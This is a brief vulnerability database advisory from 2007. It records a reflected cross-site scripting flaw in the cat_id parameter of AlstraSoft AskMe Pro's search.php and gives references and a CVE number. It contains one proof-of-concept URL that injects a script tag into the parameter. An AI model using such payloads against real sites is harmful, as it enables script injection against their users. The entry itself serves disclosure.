AlstraSoft AskMe Pro search.php cat_id Variable XSS

2007-07-22T00:00:00
ID OSVDB:37092
Type osvdb
Reporter OSVDB
Modified 2007-07-22T00:00:00

Description

Manual Testing Notes

http://[target]/ask/search.php?status=Pending&cat_id="><script>alert()</script>

References:

Related OSVDB ID: 37093 Other Advisory URL: http://lostmon.blogspot.com/2007/07/alstrasoft-multiple-products-multiple.html CVE-2007-4083